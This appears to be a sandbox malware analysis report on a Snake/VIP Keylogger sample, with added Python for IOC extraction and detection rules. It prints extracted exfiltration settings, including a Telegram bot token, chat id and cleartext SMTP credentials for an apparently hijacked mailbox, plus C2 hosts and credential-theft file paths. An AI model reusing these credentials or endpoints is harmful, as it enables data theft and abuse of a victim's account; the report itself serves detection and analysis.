Windows Analysis Report
DSD876543456780000.exe

Overview

General Information

Sample name:DSD876543456780000.exe
Analysis ID:1481105
MD5:f202040eb9d89916f413e67d59c7fd7f
SHA1:84ce5b7ca29eb6e4a5290d21c4948d505c23a04a
SHA256:59337107a058bfd8eb4b8bc0506208d1eab639b6fbd92aefb156e7b21a1d3695

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
System process connects to network (likely due to code injection or exploit)
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Drops VBS files to the startup folder
Found API chain indicative of sandbox detection
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Process Tree

  • System is w10x64
  • DSD876543456780000.exe (PID: 3332 cmdline: "C:\Users\user\Desktop\DSD876543456780000.exe" MD5: F202040EB9D89916F413E67D59C7FD7F)
    • chordates.exe (PID: 6564 cmdline: "C:\Users\user\Desktop\DSD876543456780000.exe" MD5: F202040EB9D89916F413E67D59C7FD7F)
      • svchost.exe (PID: 5260 cmdline: "C:\Users\user\Desktop\DSD876543456780000.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • wscript.exe (PID: 7096 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chordates.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • chordates.exe (PID: 7044 cmdline: "C:\Users\user\AppData\Local\nonsubmerged\chordates.exe" MD5: F202040EB9D89916F413E67D59C7FD7F)
      • svchost.exe (PID: 6024 cmdline: "C:\Users\user\AppData\Local\nonsubmerged\chordates.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger with many capabilities. The infostealer can steal a victim's sensitive information, log keystrokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"C2 url": "https://api.telegram.org/bot7339564661:AAFzTB6gEWMndjXYyD5LCn17UEBISRR8wDI/sendMessage"}
{"Exfil Mode": "Telegram", "Bot Token": "7339564661:AAFzTB6gEWMndjXYyD5LCn17UEBISRR8wDI", "Chat id": "6443825857"}
{"Exfil Mode": "SMTP", "Username": "sales-nguyen@vvtrade.vn", "Password": "qVyP6qyv6MQCmZJBRs4t", "Host": "mail.vvtrade.vn", "Port": "587"}
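The three configuration blobs above describe the same sample's two exfiltration channels: the Telegram Bot API and SMTP submission on port 587. The script below is an added example, not code from the Joe Sandbox report or from Snake Keylogger: it turns those blobs into a deduplicated IOC set, parses the Bot API URL into bot id and token (so the "C2 url" and "Bot Token" entries collapse into one indicator), keeps the secrets (bot token, SMTP password) apart from the shareable indicators, and builds a proxy-log regex keyed on the bot id so a hunt still matches if the operator switches from sendMessage to sendDocument. The function names and the defanging style are my own choices; the configuration values are the ones printed above.

```python
import re
from urllib.parse import urlsplit

# The three configurations extracted in the report, copied verbatim.
CONFIGS = [
    {"C2 url": "https://api.telegram.org/bot7339564661:AAFzTB6gEWMndjXYyD5LCn17UEBISRR8wDI/sendMessage"},
    {"Exfil Mode": "Telegram", "Bot Token": "7339564661:AAFzTB6gEWMndjXYyD5LCn17UEBISRR8wDI",
     "Chat id": "6443825857"},
    {"Exfil Mode": "SMTP", "Username": "sales-nguyen@vvtrade.vn", "Password": "qVyP6qyv6MQCmZJBRs4t",
     "Host": "mail.vvtrade.vn", "Port": "587"},
]

# Telegram Bot API paths look like /bot<numeric id>:<secret>/<method>.
BOT_PATH_RE = re.compile(r"^/bot(?P<id>\d+):(?P<secret>[A-Za-z0-9_-]+)/(?P<method>\w+)$")


def parse_telegram_c2(url):
    """Return {'bot_id', 'token', 'method'} for a Telegram Bot API URL, or None if it is not one."""
    parts = urlsplit(url)
    if parts.scheme != "https" or (parts.hostname or "").lower() != "api.telegram.org":
        return None
    m = BOT_PATH_RE.match(parts.path)
    if not m:
        return None
    return {"bot_id": m["id"], "token": f"{m['id']}:{m['secret']}", "method": m["method"]}


def defang(indicator):
    """Make a domain or URL safe to paste into tickets and chat (hxxps://, [.])."""
    return indicator.replace("https://", "hxxps://").replace("http://", "hxxp://").replace(".", "[.]")


def iocs_from_configs(configs):
    """Collapse the per-process configuration blobs into one deduplicated IOC set.

    Returns (iocs, secrets): iocs is safe to share; secrets (bot token, SMTP credentials)
    go to the takedown / victim-notification track and are never pasted into reports.
    """
    iocs = {"domains": set(), "telegram_bot_ids": set(), "telegram_chat_ids": set(),
            "smtp_accounts": set(), "dst_ports": set()}
    secrets = {"telegram_tokens": set(), "smtp_credentials": set()}
    for cfg in configs:
        if "C2 url" in cfg:
            tg = parse_telegram_c2(cfg["C2 url"])
            if tg:
                iocs["domains"].add("api.telegram.org")
                iocs["telegram_bot_ids"].add(tg["bot_id"])
                secrets["telegram_tokens"].add(tg["token"])
        mode = cfg.get("Exfil Mode")
        if mode == "Telegram":
            bot_id = cfg["Bot Token"].split(":", 1)[0]
            iocs["domains"].add("api.telegram.org")
            iocs["telegram_bot_ids"].add(bot_id)
            iocs["telegram_chat_ids"].add(cfg["Chat id"])
            secrets["telegram_tokens"].add(cfg["Bot Token"])
        elif mode == "SMTP":
            iocs["domains"].add(cfg["Host"].lower())
            iocs["smtp_accounts"].add(cfg["Username"].lower())
            iocs["dst_ports"].add(int(cfg["Port"]))
            secrets["smtp_credentials"].add((cfg["Username"], cfg["Password"]))
    return iocs, secrets


def telegram_hunt_regex(bot_ids):
    """Regex for proxy / TLS-inspection logs matching any Bot API call by these bot ids, whatever the method."""
    ids = "|".join(re.escape(b) for b in sorted(bot_ids))
    return re.compile(rf"api\.telegram\.org/bot(?:{ids}):[A-Za-z0-9_-]+/\w+")


if __name__ == "__main__":
    iocs, secrets = iocs_from_configs(CONFIGS)
    for kind, values in iocs.items():
        print(kind, [defang(str(v)) for v in sorted(values, key=str)])
    print("secrets to rotate/report:", {k: len(v) for k, v in secrets.items()})
```

Note that the SMTP account belongs to a third party whose mailbox has been taken over as a drop; blocking mail.vvtrade.vn on your own perimeter is reasonable, but the credentials themselves are a notification item for that organisation, not an indicator to publish.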
Yara matches in memory dumps:
Source: 00000006.00000002.4470352706.0000000000400000.00000040.80000000.00040000.00000000.sdmp; Rule: MALWARE_Win_RedLine; Description: Detects RedLine infostealer; Author: ditekSHen
  • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x1300:$s3: 83 EC 38 53 B0 62 88 44 24 2B 88 44 24 2F B0 08 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1fdd0:$s5: delete[]
  • 0x1f288:$s6: constructor or from DllMain.
Source: 00000002.00000002.2040744990.0000000003A90000.00000004.00001000.00020000.00000000.sdmp; Rule: MALWARE_Win_RedLine; Description: Detects RedLine infostealer; Author: ditekSHen
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 62 88 44 24 2B 88 44 24 2F B0 08 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.
Source: 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp; Rule: JoeSecurity_CredentialStealer; Description: Yara detected Credential Stealer; Author: Joe Security
Source: 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp; Rule: JoeSecurity_VIPKeylogger; Description: Yara detected VIP Keylogger; Author: Joe Security
Source: 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp; Rule: JoeSecurity_TelegramRAT; Description: Yara detected Telegram RAT; Author: Joe Security
(63 further memory-dump matches not shown)
Yara matches in unpacked PE files:
Source: 3.3.svchost.exe.305af20.1.unpack; Rule: JoeSecurity_CredentialStealer; Description: Yara detected Credential Stealer; Author: Joe Security
Source: 3.3.svchost.exe.305af20.1.unpack; Rule: JoeSecurity_VIPKeylogger; Description: Yara detected VIP Keylogger; Author: Joe Security
Source: 3.3.svchost.exe.305af20.1.unpack; Rule: JoeSecurity_TelegramRAT; Description: Yara detected Telegram RAT; Author: Joe Security
Source: 3.3.svchost.exe.305af20.1.unpack; Rule: Windows_Trojan_SnakeKeylogger_af3faa65; Description: unknown; Author: unknown
  • 0x336af:$a1: get_encryptedPassword
  • 0x33683:$a2: get_encryptedUsername
  • 0x33747:$a3: get_timePasswordChanged
  • 0x3365f:$a4: get_passwordField
  • 0x336c5:$a5: set_encryptedPassword
  • 0x33492:$a7: get_logins
  • 0x2ed56:$a10: KeyLoggerEventArgs
  • 0x2ed25:$a11: KeyLoggerEventArgsEventHandler
  • 0x33566:$a13: _encryptedPassword
Source: 3.3.svchost.exe.305af20.1.unpack; Rule: MAL_Envrial_Jan18_1; Description: Detects Encrial credential stealer malware; Author: Florian Roth
  • 0x3d481:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x3cb24:$a3: \Google\Chrome\User Data\Default\Login Data
  • 0x3cd81:$a4: \Orbitum\User Data\Default\Login Data
  • 0x3d760:$a5: \Kometa\User Data\Default\Login Data
(157 further unpacked-PE matches not shown)

              System Summary

Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chordates.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chordates.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chordates.vbs" , ProcessId: 7096, ProcessName: wscript.exe
Source: Network Connection; Author: frack113; Data: DestinationIp: 118.69.190.131, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\SysWOW64\svchost.exe, Initiated: true, ProcessId: 5260, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49734
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\Desktop\DSD876543456780000.exe", CommandLine: "C:\Users\user\Desktop\DSD876543456780000.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\DSD876543456780000.exe", ParentImage: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe, ParentProcessId: 6564, ParentProcessName: chordates.exe, ProcessCommandLine: "C:\Users\user\Desktop\DSD876543456780000.exe", ProcessId: 5260, ProcessName: svchost.exe
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chordates.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chordates.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chordates.vbs" , ProcessId: 7096, ProcessName: wscript.exe
Source: Process started; Author: vburov; Data: Command: "C:\Users\user\Desktop\DSD876543456780000.exe", CommandLine: "C:\Users\user\Desktop\DSD876543456780000.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\DSD876543456780000.exe", ParentImage: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe, ParentProcessId: 6564, ParentProcessName: chordates.exe, ProcessCommandLine: "C:\Users\user\Desktop\DSD876543456780000.exe", ProcessId: 5260, ProcessName: svchost.exe
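The Sigma matches above (wscript.exe launching a .vbs from the Startup folder, svchost.exe with chordates.exe as parent, svchost.exe connecting out on 587) and the file-create event in the next section describe one chain. The block below is an added example, not Joe Sandbox or Sigma code: it re-implements those conditions as plain Python predicates and runs them over constructed Sysmon-style events built from the report's PIDs, paths and addresses, plus two made-up benign events (a services.exe-launched svchost and a mail client talking to 587 at a documentation address) to show what must not fire. It adds a fifth check that the process tree suggests but none of the matched rules covers: the process image (svchost.exe) differing from the executable named in its own command line, which is what process hollowing leaves behind. The allowed-parent list for svchost.exe and the explorer.exe parent of wscript.exe are assumptions, not values from the report.

```python
import ntpath
import re

# Constructed Sysmon-style events modelled on the report's process tree and Sigma hits.
# PIDs, paths and the 118.69.190.131:587 connection are the report's; the wscript parent,
# the services.exe-launched svchost and the mail-client event are made up for contrast.
EVENTS = [
    {"EventID": 11, "ProcessId": 6564, "Image": r"C:\Users\user\AppData\Local\nonsubmerged\chordates.exe",
     "TargetFilename": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chordates.vbs"},
    {"EventID": 1, "ProcessId": 7096, "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\explorer.exe",  # assumed parent (the report leaves ParentImage empty)
     "CommandLine": r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chordates.vbs" '},
    {"EventID": 1, "ProcessId": 5260, "Image": r"C:\Windows\SysWOW64\svchost.exe",
     "ParentImage": r"C:\Users\user\AppData\Local\nonsubmerged\chordates.exe",
     "CommandLine": r'"C:\Users\user\Desktop\DSD876543456780000.exe"'},
    {"EventID": 3, "ProcessId": 5260, "Image": r"C:\Windows\SysWOW64\svchost.exe", "Initiated": True,
     "DestinationIp": "118.69.190.131", "DestinationPort": 587, "Protocol": "tcp"},
    # benign controls (constructed): the normal service host launch, and a mail client on 587
    {"EventID": 1, "ProcessId": 900, "Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p"},
    {"EventID": 3, "ProcessId": 4100, "Image": r"C:\Program Files\MailClient\mail.exe", "Initiated": True,
     "DestinationIp": "203.0.113.10", "DestinationPort": 587, "Protocol": "tcp"},
]

STARTUP_DIR = "\\microsoft\\windows\\start menu\\programs\\startup\\"
SCRIPT_RE = re.compile(r"\.(?:vbs|vbe|js|jse|wsf|wsh)\b", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Parents from which svchost.exe is legitimately spawned; an assumed approximation of the
# Sigma rule's exclusion list, not copied from it.
SVCHOST_PARENTS = {"services.exe", "msmpeng.exe", "mrt.exe", "rpcnet.exe", "rpcnetp.exe"}
SMTP_PORTS = {25, 465, 587, 2525}


def _name(path):
    return ntpath.basename(path or "").lower()


def _exe_from_cmdline(cmdline):
    """First token of a Windows command line, honouring a quoted executable path."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    return s.split(" ", 1)[0]


def script_dropped_to_startup(ev):
    """'Drops script at startup location': a file-create of a script inside the Startup folder."""
    t = ev.get("TargetFilename", "")
    return ev["EventID"] == 11 and STARTUP_DIR in t.lower() and bool(SCRIPT_RE.search(t))


def wsh_runs_startup_script(ev):
    """'WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript', narrowed to scripts in the Startup folder."""
    cl = ev.get("CommandLine", "")
    return (ev["EventID"] == 1 and _name(ev["Image"]) in SCRIPT_HOSTS
            and STARTUP_DIR in cl.lower() and bool(SCRIPT_RE.search(cl)))


def uncommon_svchost_parent(ev):
    """'Uncommon Svchost Parent Process': svchost.exe not started by services.exe or another known parent."""
    return (ev["EventID"] == 1 and _name(ev["Image"]) == "svchost.exe"
            and _name(ev.get("ParentImage")) not in SVCHOST_PARENTS)


def hollowed_image(ev):
    """Image on disk differs from the executable named in the command line (process hollowing residue)."""
    if ev["EventID"] != 1:
        return False
    return _name(ev["Image"]) != _name(_exe_from_cmdline(ev["CommandLine"]))


def svchost_outbound_smtp(ev):
    """'Suspicious Outbound SMTP Connections' restricted to svchost.exe, which never speaks SMTP itself."""
    return (ev["EventID"] == 3 and bool(ev.get("Initiated")) and _name(ev["Image"]) == "svchost.exe"
            and ev["DestinationPort"] in SMTP_PORTS)


RULES = [script_dropped_to_startup, wsh_runs_startup_script, uncommon_svchost_parent,
         hollowed_image, svchost_outbound_smtp]


def run_detections(events):
    """Return (rule_name, pid) pairs for every event that trips a rule, in event order."""
    hits = []
    for ev in events:
        for rule in RULES:
            if rule(ev):
                hits.append((rule.__name__, ev["ProcessId"]))
    return hits


if __name__ == "__main__":
    for rule, pid in run_detections(EVENTS):
        print(f"{rule:28s} pid={pid}")
```

Two of the five predicates fire on the same svchost.exe creation (PID 5260), which is the useful correlation: a SysWOW64 svchost.exe whose parent is a user-profile binary and whose command line names a different executable is hollowed almost without exception, and the later SMTP connection from that PID confirms it.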

              Data Obfuscation

Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe, ProcessId: 6564, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chordates.vbs
No Snort rule has matched

Suricata IDS alerts (all on 2024-07-25, UTC+02:00), in chronological order:

Time             SID      Proto  Src port  Dst port  Classtype
03:34:35.748211  2803274  TCP    49704     80        Potentially Bad Traffic
03:34:37.513826  2803274  TCP    49704     80        Potentially Bad Traffic
03:34:38.114931  2803305  TCP    49706     443       Unknown Traffic
03:34:38.826388  2803274  TCP    49707     80        Potentially Bad Traffic
03:34:40.138843  2803274  TCP    49709     80        Potentially Bad Traffic
03:34:41.435747  2803274  TCP    49711     80        Potentially Bad Traffic
03:34:42.701479  2803274  TCP    49713     80        Potentially Bad Traffic
03:34:46.149772  2803305  TCP    49718     443       Unknown Traffic
03:34:47.487230  2033966  UDP    56252     53        Misc activity
03:34:48.130043  2033967  TCP    49721     443       Misc activity
03:34:48.133134  2029322  TCP    443       49721     Misc activity
03:34:48.376956  2045615  TCP    49721     443       Misc activity
03:34:50.357572  2803274  TCP    49722     80        Potentially Bad Traffic
03:34:51.655172  2022930  TCP    443       49723     A Network Trojan was detected
03:34:52.576337  2803274  TCP    49722     80        Potentially Bad Traffic
03:34:53.126997  2803305  TCP    49730     443       Unknown Traffic
03:34:53.757840  2803274  TCP    49732     80        Potentially Bad Traffic
03:35:03.937735  2033967  TCP    49735     443       Misc activity
03:35:25.760755  2803305  TCP    49737     443       Unknown Traffic
03:35:29.798578  2022930  TCP    443       49743     A Network Trojan was detected
03:35:32.797219  2033967  TCP    49749     443       Misc activity
03:35:32.797234  2029322  TCP    443       49749     Misc activity
03:35:33.045497  2045615  TCP    49749     443       Misc activity
03:35:50.131796  2033967  TCP    49751     443       Misc activity


              AV Detection

Source: http://aborters.duckdns.org:8081; Avira URL Cloud: Label: malware
Source: http://anotherarmy.dns.army:8081; Avira URL Cloud: Label: malware
Source: 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp; Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "sales-nguyen@vvtrade.vn", "Password": "qVyP6qyv6MQCmZJBRs4t", "Host": "mail.vvtrade.vn", "Port": "587"}
Source: 3.2.svchost.exe.7730000.2.unpack; Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7339564661:AAFzTB6gEWMndjXYyD5LCn17UEBISRR8wDI", "Chat id": "6443825857"}
Source: svchost.exe.6024.6.memstrmin; Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7339564661:AAFzTB6gEWMndjXYyD5LCn17UEBISRR8wDI/sendMessage"}
Source: http://varders.kozow.com:8081; Virustotal: Detection: 14%
Source: http://aborters.duckdns.org:8081; Virustotal: Detection: 11%
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe; ReversingLabs: Detection: 37%
Source: DSD876543456780000.exe; ReversingLabs: Detection: 37%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe; Joe Sandbox ML: detected
Source: DSD876543456780000.exe; Joe Sandbox ML: detected

              Location Tracking

Source: unknown; DNS query: name: reallyfreegeoip.org
Source: DSD876543456780000.exe; Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown; HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49724 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49733 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49737 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49749 version: TLS 1.2
              Source: Binary string: _.pdb source: svchost.exe, 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: chordates.exe, 00000002.00000003.2038779865.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, chordates.exe, 00000002.00000003.2038113253.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, chordates.exe, 00000005.00000003.2178237621.0000000003D40000.00000004.00001000.00020000.00000000.sdmp, chordates.exe, 00000005.00000003.2176735582.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: chordates.exe, 00000002.00000003.2038779865.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, chordates.exe, 00000002.00000003.2038113253.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, chordates.exe, 00000005.00000003.2178237621.0000000003D40000.00000004.00001000.00020000.00000000.sdmp, chordates.exe, 00000005.00000003.2176735582.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\DSD876543456780000.exe; code functions (file enumeration):
  0_2_00C5DBBE: lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose
  0_2_00C2C2A2: FindFirstFileExW
  0_2_00C668EE: FindFirstFileW,FindClose
  0_2_00C6698F: FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime
  0_2_00C5D076: FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
  0_2_00C5D3A9: FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
  0_2_00C69642: SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
  0_2_00C6979D: SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
  0_2_00C69B2B: FindFirstFileW,Sleep,FindNextFileW,FindClose
  0_2_00C65C97: FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe; code functions (file enumeration):
  2_2_00ECDBBE: lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose
  2_2_00E9C2A2: FindFirstFileExW
  2_2_00ED68EE: FindFirstFileW,FindClose
  2_2_00ED698F: FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime
  2_2_00ECD076: FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
  2_2_00ECD3A9: FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
